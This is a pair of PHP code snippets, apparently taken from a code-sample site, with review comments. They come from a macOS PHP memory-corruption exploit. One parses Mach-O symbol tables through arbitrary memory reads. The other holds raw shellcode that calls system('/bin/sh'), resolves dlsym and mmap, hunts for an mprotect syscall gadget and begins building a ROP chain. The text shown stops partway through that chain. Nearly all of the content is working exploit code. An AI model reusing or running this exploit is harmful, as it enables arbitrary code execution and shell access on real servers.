Exemple #1
function getsymtabsym($mh, $name)
{
    // Looks up the symbol called $name in the LC_SYMTAB of the Mach-O image whose
    // header is at $mh, reading memory through r32/r64/rstr (helpers defined in a
    // required file that is not visible here).
    // Returns the computed value on a match, FALSE otherwise — including when the
    // header is not a 64-bit Mach-O.
    //
    // NOTE(review): this is a hand-rolled parser tied to one binary layout (fixed
    // 0x1d000 adjustment, string-table walk that assumes string order equals
    // symbol-table order); it is not a general Mach-O reader.
    if (r32($mh) == 0xfeedfacf) { // MH_MAGIC_64
        $lc = $mh + 32; // first load command follows the 32-byte mach_header_64
        // Bound is $mh plus sizeofcmds (header offset 20); the 32-byte header is
        // not added to it.
        while ($lc < $mh + r32($mh + 20)) {
            if (r32($lc) == 0x2) { // LC_SYMTAB
                // symtab_command fields: symoff @8, nsyms @12, stroff @16, strsize @20.
                // 0x1d000 is a hard-coded file-offset-to-memory adjustment; it is not
                // derived from the segment table, so it only fits one specific image.
                $symoff = r32(8 + $lc) + 0x1d000 + $mh;
                $nsyms = r32(12 + $lc);
                $stroff = r32(16 + $lc) + 4 + 0x1d000 + $mh; // +4 skips the table's leading bytes
                $strsize = r32(20 + $lc); // read but never used below
                $k = 0; // byte offset into the string table
                // Walks the string table sequentially; $i counts strings seen and is
                // used as the index of the nlist_64 entry. The loop condition compares
                // the byte offset $k against $nsyms (a count), not against $strsize.
                for ($i = 0; $k < $nsyms; $i++) {
                    $st = rstr($stroff + $k);
                    if ($st == $name) { // loose (==) string comparison
                        $nlist = $symoff + $i * 16; // nlist_64 entries are 16 bytes; n_value is at +8
                        // In PHP '+' binds tighter than '&', so this evaluates as
                        // r64($nlist + 8) & (0xffffffff + $mh).
                        $val = r64($nlist + 8) & 0xffffffff + $mh;
                        return $val;
                    }
                    $k += strlen($st) + 1; // step past the NUL terminator
                }
            }
            $lc += r32($lc + 4); // cmdsize of the current load command
        }
    }
    return FALSE;
}
Exemple #2
require "pm.php";
require "pm_rop_osx.php";
function w64($x)
{
    // Fixed-width (8-byte) encoding of $x through ibuf(), which comes from the
    // required pm.php; the byte order is decided there — presumably little-endian, confirm.
    $width = 8;
    $encoded = ibuf($x, $width);
    return $encoded;
}
$all = alloc(4096); // alloc() is from the required helpers; $all['ptr'] is read later, so presumably returns an array with a 'ptr' key — confirm
$shellcode = hex2bin("415F4989E665488B0425080000004883C068488B204881EC08000100488D3D410000004883E4F0E82A000000488D3D3D0000004883E4F0FFD0488D3D2B0000004883E4F0E80D00000048C7C700000000FFD04C89F4C34889FE4831FF4883EF0241FFD7C373797374656D0065786974002F62696E2F736800"); // opaque machine-code bytes; not decoded here
$addr = rop_findexec(); // from pm_rop_osx.php (not visible here)
nogc($addr); // nogc() from the required helpers; presumably pins the value against collection — confirm
$dlsym = getplt($addr, "_dlsym");
// get plt entry
nogc($dlsym);
$mmap_plt = getplt($addr, "_mmap");
// get plt entry
$mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6); // dereferences the 32-bit displacement stored at +2 of the PLT entry, relative to the entry's end at +6
nogc($mmap);
$mprotect = gadget(findmhfromaddr($mmap), "b84a000002"); // gadget(): byte-pattern search within the image that contains $mmap (helper not visible here)
// find b84a000002      	movl	$0x200004a, %eax -> mprotect syscall
nogc($mprotect);
function ig($a, $b)
{
    // Locates the byte pattern $b inside image $a via gadget() (from the required
    // helpers) and returns the result as 8 bytes via ibuf().
    $located = gadget($a, $b);
    return ibuf($located, 8);
}
$arg1 = ig($addr, "5fc3");
$arg2 = ig($addr, "5ec3");
$arg3 = ig(findmhfromaddr($mmap), "5ac3");
$stack = $arg1;
$stack .= w64($all['ptr'] & ~0xfff);
$stack .= $arg2;
$stack .= w64(4096 * 2);